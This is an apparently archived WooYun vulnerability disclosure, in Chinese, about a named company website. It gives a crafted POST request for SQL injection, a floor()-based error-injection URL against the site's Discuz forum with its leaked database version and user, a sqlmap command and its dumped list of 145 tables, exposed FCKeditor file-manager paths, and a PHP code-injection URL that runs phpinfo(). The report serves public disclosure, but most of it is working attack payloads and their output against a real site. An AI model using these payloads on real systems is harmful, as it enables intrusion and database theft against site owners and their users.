乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-16: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-04-02: 厂商已经主动忽略漏洞,细节向公众公开
存在多处sql注入点及敏感目录。
post注入点提交数据http头:
POST /down_soft.php? HTTP/1.1Host: www.bbktel.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.bbktel.com.cn/down_soft.php?Cookie: PHPSESSID=h1dpu9m881rabcr7juq64kfcm7; Isz_sid=NGN2g2Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 42Classid=4&pro_number=&image.x=42&image.y=4
论坛一样存在注入漏洞,floor强制报错语句:
数据库版本号,用户名,数据库名称http://www.bbktel.com.cn/bbs/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),user(),database(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23SQL: SELECT * FROM [Table]usergroups u LEFT JOIN [Table]admingroups a ON u.groupid=a.admingid WHERE u.groupid IN ('10','11','12','\',') and (select 1 from (select count(*),concat(version(),user(),database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#')Error: Duplicate entry '5.5.23-logbbktel_bbs@localhostbbk_tel1' for key 'group_key'
存在敏感目录
http://www.bbktel.com.cn/fckeditor/editor/filemanager/connectors/test.htmlhttp://www.bbktel.com.cn/fckeditor/editor/filemanager/browser/default/browser.html?Connector=http%3A%2F%2Fwww.bbktel.com.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php
sqlmap.py -r bbg.txt -p Classid --dbs
Database: bbk_tel[145 tables]+----------------------------+| bbk_acting || bbk_actingpower || bbk_actingscore || bbk_guest || bbk_tel_actives_tab || bbk_tel_admin_tab || bbk_tel_down_ad || bbk_tel_down_backwall || bbk_tel_down_screen || bbk_tel_guestbook || bbk_tel_huodong_tab || bbk_tel_index_pic || bbk_tel_network_tab || bbk_tel_news_tab || bbk_tel_news_type || bbk_tel_notice || bbk_tel_pingmian_class || bbk_tel_pingmian_tab || bbk_tel_pro_shuoming || bbk_tel_pro_shuoming_class || bbk_tel_pro_shuoming_tab || bbk_tel_pro_sms || bbk_tel_pro_soft || bbk_tel_product_discuss || bbk_tel_product_discuss_ty || bbk_tel_product_picture || bbk_tel_product_tab || bbk_tel_product_type || bbk_tel_sold_question || bbk_tel_sold_zhishi || bbk_tel_survey || bbk_tel_surveyprize || bbk_tel_system_tab || bbk_tel_vote || bbk_tel_votelog || bbk_tel_voteoptions || bbk_tel_year || bbk_tel_year_book || cdb_access || cdb_activities || cdb_activityapplies || cdb_addons || cdb_adminactions || cdb_admincustom || cdb_admingroups || cdb_adminnotes || cdb_adminsessions || cdb_advertisements || cdb_announcements || cdb_attachmentfields || cdb_attachments || cdb_attachpaymentlog || cdb_attachtypes || cdb_banned || cdb_bbcodes || cdb_caches || cdb_creditslog || cdb_crons || cdb_debateposts || cdb_debates || cdb_failedlogins || cdb_faqs || cdb_favoriteforums || cdb_favorites || cdb_favoritethreads || cdb_feeds || cdb_forumfields || cdb_forumlinks || cdb_forumrecommend || cdb_forums || cdb_imagetypes || cdb_invites || cdb_itempool || cdb_magiclog || cdb_magicmarket || cdb_magics || cdb_medallog || cdb_medals || cdb_memberfields || cdb_membermagics || cdb_memberrecommend || cdb_members || cdb_memberspaces || cdb_moderators || cdb_modworks || cdb_myposts || cdb_mytasks || cdb_mythreads || cdb_navs || cdb_onlinelist || cdb_onlinetime || cdb_orders || cdb_paymentlog || cdb_pluginhooks || cdb_plugins || cdb_pluginvars || cdb_polloptions || cdb_polls || cdb_postposition || cdb_posts || cdb_profilefields || cdb_projects || cdb_promotions || cdb_prompt || cdb_promptmsgs || cdb_prompttype || cdb_ranks || cdb_ratelog || cdb_regips || cdb_relatedthreads || cdb_reportlog || cdb_request || cdb_rewardlog || cdb_rsscaches || cdb_searchindex || cdb_sessions || cdb_settings || cdb_smilies || cdb_spacecaches || cdb_stats || cdb_statvars || cdb_styles || cdb_stylevars || cdb_tags || cdb_tasks || cdb_taskvars || cdb_templates || cdb_threads || cdb_threadsmod || cdb_threadtags || cdb_threadtypes || cdb_tradecomments || cdb_tradelog || cdb_tradeoptionvars || cdb_trades || cdb_typemodels || cdb_typeoptions || cdb_typeoptionvars || cdb_typevars || cdb_usergroups || cdb_validating || cdb_warnings || cdb_words || cdb_xreports || notice |+----------------------------+
管理员账户密码:
用户信息:
敏感信息暴漏:
www.bbktel.com.cn/bbs/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}}
漏洞太多,慢慢修补吧。
未能联系到厂商或者厂商积极拒绝